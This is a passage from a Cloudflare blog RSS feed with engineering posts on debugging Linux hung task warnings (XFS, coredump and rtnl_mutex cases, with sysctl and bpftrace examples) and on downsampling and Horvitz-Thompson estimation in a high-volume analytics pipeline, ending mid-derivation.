  _\x1B[69G|___H__/__|_\x1B[14;59H|/ |   |-\x1B[78GI_\x1B[15;57H__/ =| o |=-~~\\  /~~\\  /\x1B[16;58H|/-=|___|=O=====O=====O\x1B[17;59H\\_/      \\__/  \\__/  \\\x1B[8;62H====
  \x1B[74G_\r\x1B[9d\x1B[1P\x1B[10;59H|(_)---  |   H\\_\r\x1B  |  |   H  |__-\x1B[13;58H| _\x1B[68G|___H__/__|_\x1B[14;58H|/ |   |-\x1B[77GI_\x1B[15;56H__/ =| o |=-~~\\ /~~\\  /~\x1B[16;57H|/-=|___|=
  ||    ||\x1B[K\x1B[17;58H\\_/      \\O=====O=====O\x1B[8;61H==== \x1B[73G_\r\x1B[9d\x1B[1P\x1B[10;58H|(_)---    _\x1B[67G|___H__/__|_\x1B[14;57H|/ |   |-\x1B[76GI_\x1B[15;55H__/ =| o |=-~~\\  /~~\\
  /~\r\x1B[16d\x1B[1P\x1B[17;57H\\_/      \\_\x1B[2;75H(  ) (\x1B[3;70H(@@@)\x1B[K\x1B[4;66H()\x1B[K\x1B[5;63H(@@@@)\x1B[</code></pre>
            
    <div>
      <h2>Acknowledgements</h2>
      <a href="#acknowledgements">
        
      </a>
    </div>
    <p>Thank you to my colleagues Mengnan Gong and Shuhao Zhang, whose ideas and perspectives helped narrow down the root causes of this mystery.</p><p>If you enjoy troubleshooting weird and tricky production issues, <a href="https://www.cloudflare.com/en-gb/careers/jobs/?department=Engineering"><i><u>our engineering teams are hiring</u></i></a><i>.</i></p> ]]></content:encoded>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <guid isPermaLink="false">4X0QnKvMC0yi0eRv5YqC7g</guid>
            <dc:creator>Yew Leong</dc:creator>
        </item>
        <item>
            <title><![CDATA[Searching for the cause of hung tasks in the Linux kernel]]></title>
            <link>https://blog.cloudflare.com/searching-for-the-cause-of-hung-tasks-in-the-linux-kernel/</link>
            <pubDate>Fri, 14 Feb 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ The Linux kernel can produce a hung task warning. Searching the Internet and the kernel docs, you can find a brief explanation that the process is stuck in the uninterruptible state. ]]></description>
            <content:encoded><![CDATA[ <p>Depending on your configuration, the Linux kernel can produce a hung task warning message in its log. Searching the Internet and the kernel documentation, you can find a brief explanation that the kernel process is stuck in the uninterruptible state and hasn’t been scheduled on the CPU for an unexpectedly long period of time. That explains the warning’s meaning, but doesn’t provide the reason it occurred. In this blog post we’re going to explore how the hung task warning works, why it happens, whether it is a bug in the Linux kernel or the application itself, and whether it is worth monitoring at all.</p>
    <div>
      <h3>INFO: task XXX:1495882 blocked for more than YYY seconds.</h3>
      <a href="#info-task-xxx-1495882-blocked-for-more-than-yyy-seconds">
        
      </a>
    </div>
    <p>The hung task message in the kernel log looks like this:</p>
            <pre><code>INFO: task XXX:1495882 blocked for more than YYY seconds.
     Tainted: G          O       6.6.39-cloudflare-2024.7.3 #1
"echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:XXX         state:D stack:0     pid:1495882 ppid:1      flags:0x00004002
. . .</code></pre>
    <p>Processes in Linux can be in different states. Some of them are running or ready to run on the CPU — they are in the <a href="https://elixir.bootlin.com/linux/v6.12.6/source/include/linux/sched.h#L99"><code><u>TASK_RUNNING</u></code></a> state. Others are waiting for some signal or event to happen, e.g. network packets to arrive or terminal input from a user. They are in the <code>TASK_INTERRUPTIBLE</code> state and can spend an arbitrary length of time in it until woken up by a signal. The most important thing about these states is that the process can still receive signals, and be terminated by a signal. In contrast, a process in the <code>TASK_UNINTERRUPTIBLE</code> state waits only for certain special classes of events to wake it up, and can’t be interrupted by a signal. Signals are not delivered until the process emerges from this state, and if it never does, only a system reboot can clear the process. It’s marked with the letter <code>D</code> in the log shown above.</p><p>What if this wake-up event doesn’t happen, or happens with a significant delay? (A “significant delay” may be on the order of seconds or minutes, depending on the system.) Then our dependent process hangs in this state. What if this process holds some lock and prevents other processes from acquiring it? Or what if we see many processes in the <code>D</code> state? Then it might tell us that some of the system’s resources are overwhelmed or not working correctly. At the same time, this state is very valuable, especially if we want to preserve the process memory. It might be useful if part of the data is written to disk and another part is still in the process memory — we don’t want inconsistent data on disk. Or maybe we want a snapshot of the process memory when a bug is hit. To preserve this behaviour but make it more controlled, a new state was introduced in the kernel: <a href="https://lwn.net/Articles/288056/"><code><u>TASK_KILLABLE</u></code></a> — it still protects a process, but allows termination with a fatal signal.</p>
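            <p>If you want to see these states on a live Linux system, the state letter of every process is exposed via <code>/proc</code> (this is generic procfs usage, not specific to the hung task detector):</p>
            <pre><code># State of the current process: R (running), S (interruptible sleep),
# D (uninterruptible sleep), and so on
grep '^State:' /proc/self/status

# List any processes currently in the uninterruptible D state
ps -eo pid,state,comm | awk '$2 == "D"'</code></pre>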
    <div>
      <h3>How Linux identifies the hung process</h3>
      <a href="#how-linux-identifies-the-hung-process">
        
      </a>
    </div>
    <p>The Linux kernel has a special thread called <code>khungtaskd</code>. It runs regularly, depending on the settings, iterating over all processes in the <code>D</code> state. If a process has been in this state for more than YYY seconds, a message is written to the kernel log. The daemon has several settings that you can tune for your system:</p>
            <pre><code>$ sudo sysctl -a --pattern hung
kernel.hung_task_all_cpu_backtrace = 0
kernel.hung_task_check_count = 4194304
kernel.hung_task_check_interval_secs = 0
kernel.hung_task_panic = 0
kernel.hung_task_timeout_secs = 10
kernel.hung_task_warnings = 200</code></pre>
            <p>At Cloudflare, we changed the notification threshold <code>kernel.hung_task_timeout_secs</code> from the default 120 seconds to 10 seconds. You can adjust the value for your system depending on its configuration and how critical this delay is for you. If a process spends more than <code>hung_task_timeout_secs</code> seconds in the D state, a log entry is written, and our internal monitoring system emits an alert based on this log. Another important setting here is <code>kernel.hung_task_warnings</code> — the total number of messages that will be sent to the log. We limit it to 200 messages and reset the counter every 15 minutes. This keeps us from being flooded by a single recurring issue, while not silencing our monitoring for too long. You can make it unlimited by <a href="https://docs.kernel.org/admin-guide/sysctl/kernel.html#hung-task-warnings"><u>setting the value to "-1"</u></a>.</p><p>To better understand the root causes of hung tasks and how a system can be affected, we’re going to review some more detailed examples.</p>
    <div>
      <h3>Example #1 or XFS</h3>
      <a href="#example-1-or-xfs">
        
      </a>
    </div>
    <p>Typically, there is a meaningful process or application name in the log, but sometimes you might see something like this:</p>
            <pre><code>INFO: task kworker/13:0:834409 blocked for more than 11 seconds.
 	Tainted: G      	O   	6.6.39-cloudflare-2024.7.3 #1
"echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:kworker/13:0	state:D stack:0 	pid:834409 ppid:2   flags:0x00004000
Workqueue: xfs-sync/dm-6 xfs_log_worker</code></pre>
            <p>In this log, <code>kworker</code> is a kernel thread. It’s used as a deferring mechanism, meaning a piece of work will be scheduled to be executed in the future. Under <code>kworker</code>, the work is aggregated from different tasks, which makes it difficult to tell which application is experiencing a delay. Luckily, the <code>kworker</code> is accompanied by the <a href="https://docs.kernel.org/core-api/workqueue.html"><code><u>Workqueue</u></code></a> line. A <code>Workqueue</code> is a linked list, usually predefined in the kernel, where these pieces of work are added and performed by the <code>kworker</code> in the order they were added to the queue. The <code>Workqueue</code> name <code>xfs-sync</code> and <a href="https://elixir.bootlin.com/linux/v6.12.6/source/kernel/workqueue.c#L6096"><u>the function it points to</u></a>, <code>xfs_log_worker</code>, give a good clue where to look. Here we can assume that <a href="https://en.wikipedia.org/wiki/XFS"><u>XFS</u></a> is under pressure and check the relevant metrics. This helped us discover that, due to some configuration changes, we had forgotten the <code>no_read_workqueue</code> / <code>no_write_workqueue</code> flags that were introduced some time ago to <a href="https://blog.cloudflare.com/speeding-up-linux-disk-encryption/"><u>speed up Linux disk encryption</u></a>.</p><p><i>Summary</i>: In this case, nothing critical happened to the system, but the hung task warnings alerted us that our file system had slowed down.</p>
    <div>
      <h3>Example #2 or Coredump</h3>
      <a href="#example-2-or-coredump">
        
      </a>
    </div>
    <p>Let’s take a look at the next hung task log and its decoded stack trace:</p>
            <pre><code>INFO: task test:964 blocked for more than 5 seconds.
      Not tainted 6.6.72-cloudflare-2025.1.7 #1
"echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:test            state:D stack:0     pid:964   ppid:916    flags:0x00004000
Call Trace:
&lt;TASK&gt;
__schedule (linux/kernel/sched/core.c:5378 linux/kernel/sched/core.c:6697) 
schedule (linux/arch/x86/include/asm/preempt.h:85 (discriminator 13) linux/kernel/sched/core.c:6772 (discriminator 13)) 
[do_exit (linux/kernel/exit.c:433 (discriminator 4) linux/kernel/exit.c:825 (discriminator 4)) 
? finish_task_switch.isra.0 (linux/arch/x86/include/asm/irqflags.h:42 linux/arch/x86/include/asm/irqflags.h:77 linux/kernel/sched/sched.h:1385 linux/kernel/sched/core.c:5132 linux/kernel/sched/core.c:5250) 
do_group_exit (linux/kernel/exit.c:1005) 
get_signal (linux/kernel/signal.c:2869) 
? srso_return_thunk (linux/arch/x86/lib/retpoline.S:217) 
? hrtimer_try_to_cancel.part.0 (linux/kernel/time/hrtimer.c:1347) 
arch_do_signal_or_restart (linux/arch/x86/kernel/signal.c:310) 
? srso_return_thunk (linux/arch/x86/lib/retpoline.S:217) 
? hrtimer_nanosleep (linux/kernel/time/hrtimer.c:2105) 
exit_to_user_mode_prepare (linux/kernel/entry/common.c:176 linux/kernel/entry/common.c:210) 
syscall_exit_to_user_mode (linux/arch/x86/include/asm/entry-common.h:91 linux/kernel/entry/common.c:141 linux/kernel/entry/common.c:304) 
? srso_return_thunk (linux/arch/x86/lib/retpoline.S:217) 
do_syscall_64 (linux/arch/x86/entry/common.c:88) 
entry_SYSCALL_64_after_hwframe (linux/arch/x86/entry/entry_64.S:121) 
&lt;/TASK&gt;</code></pre>
            <p>The stack trace says that the process or application <code>test</code> was blocked <code>for more than 5 seconds</code>. We might recognise this user space application by its name, but why is it blocked? It’s always helpful to check the stack trace when looking for a cause. The most interesting line here is <code>do_exit (linux/kernel/exit.c:433 (discriminator 4) linux/kernel/exit.c:825 (discriminator 4))</code>. The <a href="https://elixir.bootlin.com/linux/v6.6.67/source/kernel/exit.c#L825"><u>source code</u></a> points to the <code>coredump_task_exit</code> function. Additionally, checking the process metrics revealed that the application crashed at the time the warning message appeared in the log. When a process is terminated abnormally by certain signals, <a href="https://man7.org/linux/man-pages/man5/core.5.html"><u>the Linux kernel can provide a core dump file</u></a>, if enabled. The mechanism works as follows: when a process terminates, the kernel makes a snapshot of the process memory before exiting and either writes it to a file or sends it through a socket to another handler — which can be <a href="https://systemd.io/COREDUMP/"><u>systemd-coredump</u></a> or your custom one. While this happens, the kernel keeps the process in the <code>D</code> state to preserve its memory and protect it from early termination. The higher the process’s memory usage, the longer it takes to produce the core dump file, and the higher the chance of getting a hung task warning.</p><p>Let’s check our hypothesis by triggering it with a small Go program. We’ll use the default Linux coredump handler and decrease the hung task threshold to 1 second.</p><p>Coredump settings:</p>
            <pre><code>$ sudo sysctl -a --pattern kernel.core
kernel.core_pattern = core
kernel.core_pipe_limit = 16
kernel.core_uses_pid = 1</code></pre>
            <p>You can make changes with <a href="https://man7.org/linux/man-pages/man8/sysctl.8.html"><u>sysctl</u></a>:</p>
            <pre><code>$ sudo sysctl -w kernel.core_uses_pid=1</code></pre>
            <p>Hung task settings:</p>
            <pre><code>$ sudo sysctl -a --pattern hung
kernel.hung_task_all_cpu_backtrace = 0
kernel.hung_task_check_count = 4194304
kernel.hung_task_check_interval_secs = 0
kernel.hung_task_panic = 0
kernel.hung_task_timeout_secs = 1
kernel.hung_task_warnings = -1</code></pre>
            <p>Go program:</p>
            <pre><code>$ cat main.go
package main

import (
	"os"
	"time"
)

func main() {
	_, err := os.ReadFile("test.file")
	if err != nil {
		panic(err)
	}
	time.Sleep(8 * time.Minute) 
}</code></pre>
            <p>This program reads a 10 GB file into process memory. Let’s create the file:</p>
            <pre><code>$ yes this is 10GB file | head -c 10GB &gt; test.file</code></pre>
            <p>The last step is to build the Go program, crash it, and watch our kernel log:</p>
            <pre><code>$ go mod init test
$ go build .
$ GOTRACEBACK=crash ./test
$ (Ctrl+\)</code></pre>
            <p>Hooray! We can see our hung task warning:</p>
            <pre><code>$ sudo dmesg -T | tail -n 31
INFO: task test:8734 blocked for more than 22 seconds.
      Not tainted 6.6.72-cloudflare-2025.1.7 #1
      Blocked by coredump.
"echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:test            state:D stack:0     pid:8734  ppid:8406   task_flags:0x400448 flags:0x00004000</code></pre>
            <p>By the way, have you noticed the <code>Blocked by coredump.</code> line in the log? It was recently added to the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm.git/commit/?h=mm-nonmm-stable&amp;id=23f3f7625cfb55f92e950950e70899312f54afb7"><u>upstream</u></a> code to improve visibility and remove the blame from the process itself. The patch also added the <code>task_flags</code> information, as <code>Blocked by coredump</code> is detected via the flag <a href="https://elixir.bootlin.com/linux/v6.13.1/source/include/linux/sched.h#L1675"><code><u>PF_POSTCOREDUMP</u></code></a>, and knowing all the task flags is useful for further root-cause analysis.</p><p><i>Summary</i>: This example showed that even if everything suggests that the application is the problem, the real root cause can be something else — in this case, <code>coredump</code>.</p>
    <div>
      <h3>Example #3 or rtnl_mutex</h3>
      <a href="#example-3-or-rtnl_mutex">
        
      </a>
    </div>
    <p>This one was tricky to debug. Usually, the alerts are limited to one or two different processes, meaning only a certain application or subsystem is experiencing an issue. In this case, we saw dozens of unrelated tasks hanging for minutes with no improvement over time. Nothing else was in the log, most of the system metrics were fine, and existing traffic was being served, but it was not possible to ssh to the server. New Kubernetes container creations were also stalling. Analyzing the stack traces of different tasks initially revealed that all the traces were limited to just three functions:</p>
            <pre><code>rtnetlink_rcv_msg+0x9/0x3c0
dev_ethtool+0xc6/0x2db0 
bonding_show_bonds+0x20/0xb0</code></pre>
            <p>Further investigation showed that all of these functions were waiting for <a href="https://elixir.bootlin.com/linux/v6.6.74/source/net/core/rtnetlink.c#L76"><code><u>rtnl_lock</u></code></a> to be acquired. It looked like some application acquired the <code>rtnl_mutex</code> and didn’t release it. All other processes were in the <code>D</code> state waiting for this lock.</p><p>The RTNL lock is primarily used by the kernel networking subsystem for any network-related config, for both writing and reading. The RTNL is a global <b>mutex</b> lock, although <a href="https://lpc.events/event/18/contributions/1959/"><u>upstream efforts</u></a> are being made for splitting up RTNL per network namespace (netns).</p><p>From the hung task reports, we can observe the “victims” that are being stalled waiting for the lock, but how do we identify the task that is holding this lock for too long? For troubleshooting this, we leveraged <code>BPF</code> via a <code>bpftrace</code> script, as this allows us to inspect the running kernel state. The <a href="https://elixir.bootlin.com/linux/v6.6.75/source/include/linux/mutex.h#L67"><u>kernel's mutex implementation</u></a> has a struct member called <code>owner</code>. It contains a pointer to the <a href="https://elixir.bootlin.com/linux/v6.6.75/source/include/linux/sched.h#L746"><code><u>task_struct</u></code></a> from the mutex-owning process, except it is encoded as type <code>atomic_long_t</code>. This is because the mutex implementation stores some state information in the lower 3-bits (mask 0x7) of this pointer. Thus, to read and dereference this <code>task_struct</code> pointer, we must first mask off the lower bits (0x7).</p><p>Our <code>bpftrace</code> script to determine who holds the mutex is as follows:</p>
            <pre><code>#!/usr/bin/env bpftrace
interval:s:10 {
  $rtnl_mutex = (struct mutex *) kaddr("rtnl_mutex");
  $owner = (struct task_struct *) ($rtnl_mutex-&gt;owner.counter &amp; ~0x07);
  if ($owner != 0) {
    printf("rtnl_mutex-&gt;owner = %u %s\n", $owner-&gt;pid, $owner-&gt;comm);
  }
}</code></pre>
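            <p>The pointer masking this script performs can be illustrated with plain shell arithmetic (the address below is made up for illustration, not taken from a real kernel):</p>
            <pre><code># Hypothetical owner word: a task_struct pointer with mutex state
# flags encoded in its low 3 bits (mask 0x7)
owner=$(( 0xffff88810a2b3c45 ))
# Clearing those bits recovers the aligned task_struct pointer
printf '0x%x\n' $(( owner & ~0x07 ))</code></pre>
            <p>This prints <code>0xffff88810a2b3c40</code>: the same pointer with the three flag bits cleared, which is what the <code>owner.counter &amp; ~0x07</code> expression in the <code>bpftrace</code> script does.</p>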
            <p>In this script, <code>rtnl_mutex</code> is a global lock whose address is exposed via <code>/proc/kallsyms</code> – using the <code>bpftrace</code> helper function <code>kaddr()</code>, we can access the struct mutex pointer from the <code>kallsyms</code> address. Thus, we can periodically (via <code>interval:s:10</code>) check whether someone is holding this lock.</p><p>In the output we had this:</p>
            <pre><code>rtnl_mutex-&gt;owner = 3895365 calico-node</code></pre>
            <p>This allowed us to quickly identify <code>calico-node</code> as the process holding the RTNL lock for too long. To see where this process itself was stalled, its call stack is available via <code>/proc/3895365/stack</code>. This showed us that the root cause was a Wireguard config change, with function <code>wg_set_device()</code> holding the RTNL lock, and <code>peer_remove_after_dead()</code> waiting too long for a <code>napi_disable()</code> call. We continued debugging via a tool called <a href="https://drgn.readthedocs.io/en/latest/user_guide.html#stack-traces"><code><u>drgn</u></code></a>, which is a programmable debugger that can inspect a running kernel via a Python-like interactive shell. We still haven’t discovered the root cause of the Wireguard issue and have <a href="https://lore.kernel.org/lkml/CALrw=nGoSW=M-SApcvkP4cfYwWRj=z7WonKi6fEksWjMZTs81A@mail.gmail.com/"><u>asked the upstream</u></a> for help, but that is another story.</p><p><i>Summary</i>: The hung task messages were the only ones we had in the kernel log. Each stack trace of these messages was unique, but by carefully analyzing them, we could spot similarities and continue debugging with other instruments.</p>
    <div>
      <h3>Epilogue</h3>
      <a href="#epilogue">
        
      </a>
    </div>
    <p>Your system might have different hung task warnings, and we have many others not mentioned here. Each case is unique, and there is no standard approach to debug them. But hopefully this blog post helps you better understand why it’s good to have these warnings enabled, how they work, and what the meaning is behind them. We tried to provide some navigation guidance for the debugging process as well:</p><ul><li><p>analyzing the stack trace might be a good starting point for debugging it, even if all the messages look unrelated, like we saw in example #3</p></li><li><p>keep in mind that the alert might be misleading, pointing to the victim and not the offender, as we saw in example #2 and example #3</p></li><li><p>if the kernel doesn’t schedule your application on the CPU, puts it in the D state, and emits the warning – the real problem might exist in the application code</p></li></ul><p>Good luck with your debugging, and hopefully this material will help you on this journey!</p> ]]></content:encoded>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Kernel]]></category>
            <category><![CDATA[Monitoring]]></category>
            <guid isPermaLink="false">3UHNgpNPKn2IAwDUzD4m3a</guid>
            <dc:creator>Oxana Kharitonova</dc:creator>
            <dc:creator>Jesper Brouer</dc:creator>
        </item>
        <item>
            <title><![CDATA[Over 700 million events/second: How we make sense of too much data]]></title>
            <link>https://blog.cloudflare.com/how-we-make-sense-of-too-much-data/</link>
            <pubDate>Mon, 27 Jan 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Here we explain how we made our data pipeline scale to 700 million events per second while becoming more resilient than ever before. We share some math behind our approach and some of the designs of  ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare's network provides an enormous array of services to our customers. We collect and deliver associated data to customers in the form of event logs and aggregated analytics. As of December 2024, our data pipeline is ingesting up to 706M events per second generated by Cloudflare's services, and that represents 100x growth since our <a href="https://blog.cloudflare.com/http-analytics-for-6m-requests-per-second-using-clickhouse/"><u>2018 data pipeline blog post</u></a>. </p><p>At peak, we are moving 107 <a href="https://simple.wikipedia.org/wiki/Gibibyte"><u>GiB</u></a>/s of compressed data, either pushing it directly to customers or subjecting it to additional queueing and batching.</p><p>All of these data streams power things like <a href="https://developers.cloudflare.com/logs/"><u>Logs</u></a>, <a href="https://developers.cloudflare.com/analytics/"><u>Analytics</u></a>, and billing, as well as other products, such as training machine learning models for bot detection. This blog post is focused on techniques we use to efficiently and accurately deal with the high volume of data we ingest for our Analytics products. A previous <a href="https://blog.cloudflare.com/cloudflare-incident-on-november-14-2024-resulting-in-lost-logs/"><u>blog post</u></a> provides a deeper dive into the data pipeline for Logs. </p><p>The pipeline can be roughly described by the following diagram.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5ihv6JXx19nJiEyfCaCg8V/ad7081720514bafd070cc38a04bc7097/BLOG-2486_2.jpg" />
          </figure><p>The data pipeline has multiple stages, and each can and will naturally break or slow down because of hardware failures or misconfiguration. And when that happens, there is just too much data to be able to buffer it all for very long. Eventually some will get dropped, causing gaps in analytics and a degraded product experience unless proper mitigations are in place.</p>
    <div>
      <h3>Dropping data to retain information</h3>
      <a href="#dropping-data-to-retain-information">
        
      </a>
    </div>
    <p>How does one retain valuable information from more than half a billion events per second, when some must be dropped? Drop it in a controlled way, by downsampling.</p><p>Here is a visual analogy showing the difference between uncontrolled data loss and downsampling. In both cases the same number of pixels were delivered. One is a higher resolution view of just a small portion of a popular painting, while the other shows the full painting, albeit blurry and highly pixelated.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4kUGB4RLQzFb7cphMpHqAg/e7ccf871c73e0e8ca9dcac32fe265f18/Screenshot_2025-01-24_at_10.57.17_AM.png" />
          </figure><p>As we noted above, any point in the pipeline can fail, so we want the ability to downsample at any point as needed. Some services proactively downsample data at the source before it even hits Logfwdr. This makes the information extracted from that data a little bit blurry, but much more useful than what otherwise would be delivered: random chunks of the original with gaps in between, or even nothing at all. The amount of "blur" is outside our control (we make our best effort to deliver full data), but there is a robust way to estimate it, as discussed in the <a href="/how-we-make-sense-of-too-much-data/#extracting-value-from-downsampled-data"><u>next section</u></a>.</p><p>Logfwdr can decide to downsample data sitting in the buffer when it overflows. Logfwdr handles many data streams at once, so we need to prioritize them by assigning each data stream a weight and then applying <a href="https://en.wikipedia.org/wiki/Max-min_fairness"><u>max-min fairness</u></a> to better utilize the buffer. It allows each data stream to store as much as it needs, as long as the whole buffer is not saturated. Once it is saturated, streams divide it fairly according to their weighted size.</p><p>In our implementation (Go), each data stream is driven by a goroutine, and they cooperate via channels. They consult a single tracker object every time they allocate and deallocate memory. The tracker uses a <a href="https://en.wikipedia.org/wiki/Heap_(data_structure)"><u>max-heap</u></a> to always know who the heaviest participant is and what the total usage is. Whenever the total usage goes over the limit, the tracker repeatedly sends the "please shed some load" signal to the heaviest participant, until the usage is again under the limit.</p><p>The effect of this is that healthy streams, which buffer a tiny amount, allocate whatever they need without losses. 
Any lagging streams split the remaining memory allowance fairly.</p><p>We downsample more or less uniformly, by always taking some of the least-downsampled batches from the buffer (using a min-heap to find them) and merging them together upon downsampling.</p>
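<p>To make the max-min fairness idea concrete, here is a minimal Python sketch of such a tracker (our own toy model, not the production Go code; the class, the stream names, and the "shed half the buffer" policy are illustrative assumptions):</p>

```python
import heapq

class BufferTracker:
    """Toy model of the shared-buffer tracker: streams report their usage,
    and whenever the total exceeds the limit, the heaviest stream is asked
    to shed load (downsample), until the total fits again."""

    def __init__(self, limit):
        self.limit = limit
        self.usage = {}  # stream name -> bytes currently buffered

    def report(self, stream, size):
        self.usage[stream] = size

    def shed_requests(self):
        """Return the sequence of 'please shed some load' signals sent.
        Here shedding halves a stream's buffer (a 2:1 downsample)."""
        heap = [(-size, name) for name, size in self.usage.items()]
        heapq.heapify(heap)  # max-heap via negated sizes
        total = sum(self.usage.values())
        signals = []
        while total > self.limit and heap:
            neg, name = heapq.heappop(heap)
            size = -neg
            kept = size // 2
            total -= size - kept
            self.usage[name] = kept
            signals.append(name)
            if kept:
                heapq.heappush(heap, (-kept, name))
        return signals

tracker = BufferTracker(limit=100)
tracker.report("healthy", 10)   # small, well-behaved stream
tracker.report("lagging", 200)  # stream whose consumer stalled
signals = tracker.shed_requests()
assert "healthy" not in signals        # the healthy stream is untouched
assert tracker.usage["lagging"] <= 90  # only the heavy stream was shed
```

<p>Only the heaviest stream is ever signaled, so streams buffering a tiny amount never lose data, which is the behavior described above.</p>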
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/15VP0VYkrvkQboX9hrOy0q/e3d087fe704bd1b0ee41eb5b7a24b899/BLOG-2486_4.png" />
          </figure><p><sup><i>Merging keeps the batches roughly the same size and their number under control.</i></sup></p><p>Downsampling is cheap, but since data in the buffer is compressed, it causes recompression, which is the single most expensive thing we do to the data. But using extra CPU time is the last thing you want to do when the system is under heavy load! We compensate for the recompression costs by starting to downsample the fresh data as well (before it gets compressed for the first time) whenever the stream is in the "shed the load" state.</p><p>We called this approach "bottomless buffers", because you can squeeze effectively infinite amounts of data in there, and it will just automatically be thinned out. Bottomless buffers resemble <a href="https://en.wikipedia.org/wiki/Reservoir_sampling"><u>reservoir sampling</u></a>, where the buffer is the reservoir and the population comes as the input stream. But there are some differences. First is that in our pipeline the input stream of data never ends, while reservoir sampling assumes it ends to finalize the sample. Secondly, the resulting sample also never ends.</p><p>Let's look at the next stage in the pipeline: Logreceiver. It sits in front of a distributed queue. The purpose of logreceiver is to partition each stream of data by a key that makes it easier for Logpush, Analytics inserters, or some other process to consume.</p><p>Logreceiver proactively performs adaptive sampling of analytics. This improves the accuracy of analytics for small customers (receiving on the order of 10 events per day), while more aggressively downsampling large customers (millions of events per second). Logreceiver then pushes the same data at multiple resolutions (100%, 10%, 1%, etc.) into different topics in the distributed queue. 
This allows it to keep pushing something rather than nothing when the queue is overloaded, by just skipping writing the high-resolution samples of data.</p><p>The same goes for Inserters: they can skip <i>reading or writing</i> high-resolution data. The Analytics APIs can skip <i>reading</i> high resolution data. The analytical database might be unable to read high resolution data because of overload or degraded cluster state or because there is just too much to read (very wide time range or very large customer). Adaptively dropping to lower resolutions allows the APIs to return <i>some</i> results in all of those cases.</p>
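<p>The multi-resolution topics can be sketched in a few lines of Python (our own illustration, not Logreceiver code; the function name and topic layout are assumptions):</p>

```python
import random

RESOLUTIONS = [1.0, 0.1, 0.01]  # 100%, 10%, 1% topics

def route_to_topics(events, rng=None):
    """Write each event to every resolution topic whose threshold it passes.
    Using a single random draw per event makes the samples nested: the 1%
    topic is always a subsample of the 10% topic."""
    rng = rng or random.Random(0)
    topics = {p: [] for p in RESOLUTIONS}
    for event in events:
        r = rng.random()
        for p in RESOLUTIONS:
            if r < p:
                topics[p].append(event)
    return topics

topics = route_to_topics(range(100_000))
assert len(topics[1.0]) == 100_000            # full-resolution topic
assert set(topics[0.01]) <= set(topics[0.1])  # nested samples
```

<p>Under overload, a producer can simply skip writing the high-resolution topics, and a consumer can fall back to reading a coarser one.</p>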
    <div>
      <h3>Extracting value from downsampled data</h3>
      <a href="#extracting-value-from-downsampled-data">
        
      </a>
    </div>
    <p>Okay, we have some downsampled data in the analytical database. It looks like the original data, but with some rows missing. How do we make sense of it? How do we know if the results can be trusted?</p><p>Let's look at the math.</p>Since the amount of sampling can vary over time and between nodes in the distributed system, we need to store this information along with the data. With each event $x_i$ we store its sample interval, which is the reciprocal of its inclusion probability $\pi_i = \frac{1}{\text{sample interval}}$. For example, if we sample 1 in every 1,000 events, each of the events included in the resulting sample will have its $\pi_i = 0.001$, so the sample interval will be 1,000. When we further downsample that batch of data, the inclusion probabilities (and the sample intervals) multiply together: a 1 in 1,000 sample from a 1 in 1,000 sample is a 1 in 1,000,000 sample of the original population. The sample interval of an event can also be interpreted roughly as the number of original events that this event represents, so in the literature it is known as weight $w_i = \frac{1}{\pi_i}$.
<p></p>
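<p>A tiny Python sketch of how the weights propagate through repeated sampling (the function is ours, for illustration; each event gets an independent Bernoulli trial):</p>

```python
import random

def poisson_downsample(events, p, rng=None):
    """Keep each (value, weight) pair independently with probability p;
    survivors' weights are multiplied by the new sample interval 1/p."""
    rng = rng or random.Random(0)
    return [(x, w / p) for (x, w) in events if rng.random() < p]

# A 1-in-10 sample of a 1-in-1,000 sample: each surviving event now
# represents roughly 10,000 original events.
events = [(1, 1000.0)] * 10_000
sample = poisson_downsample(events, 0.1)
assert all(w == 10_000.0 for _, w in sample)
assert 0 < len(sample) < len(events)
```
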
We rely on the <a href="https://en.wikipedia.org/wiki/Horvitz%E2%80%93Thompson_estimator">Horvitz-Thompson estimator</a> (HT, <a href="https://www.stat.cmu.edu/~brian/905-2008/papers/Horvitz-Thompson-1952-jasa.pdf">paper</a>) in order to derive analytics about $x_i$. It gives two estimates: the analytical estimate (e.g. the population total or size) and the estimate of the variance of that estimate. The latter enables us to figure out how accurate the results are by building <a href="https://en.wikipedia.org/wiki/Confidence_interval">confidence intervals</a>. They define ranges that cover the true value with a given probability <i>(confidence level)</i>. A typical confidence level is 0.95, at which a confidence interval (a, b) tells that you can be 95% sure the true SUM or COUNT is between a and b.
<p></p><p>So far, we know how to use the HT estimator for doing SUM, COUNT, and AVG.</p>Given a sample of size $n$, consisting of values $x_i$ and their inclusion probabilities $\pi_i$, the HT estimator for the population total (i.e. SUM) would be

$$\widehat{T}=\sum_{i=1}^n{\frac{x_i}{\pi_i}}=\sum_{i=1}^n{x_i w_i}.$$

The variance of $\widehat{T}$ is:

$$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} + \sum_{i \neq j}^n{x_i x_j \frac{\pi_{ij} - \pi_i \pi_j}{\pi_{ij} \pi_i \pi_j}},$$

where $\pi_{ij}$ is the probability of both $i$-th and $j$-th events being sampled together.
<p></p>
We use <a href="https://en.wikipedia.org/wiki/Poisson_sampling">Poisson sampling</a>, where each event is subjected to an independent <a href="https://en.wikipedia.org/wiki/Bernoulli_trial">Bernoulli trial</a> ("coin toss") which determines whether the event becomes part of the sample. Since each trial is independent, we can equate $\pi_{ij} = \pi_i \pi_j$, which when plugged in the variance estimator above turns the right-hand sum to zero:

$$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} + \sum_{i \neq j}^n{x_i x_j \frac{0}{\pi_{ij} \pi_i \pi_j}},$$

thus

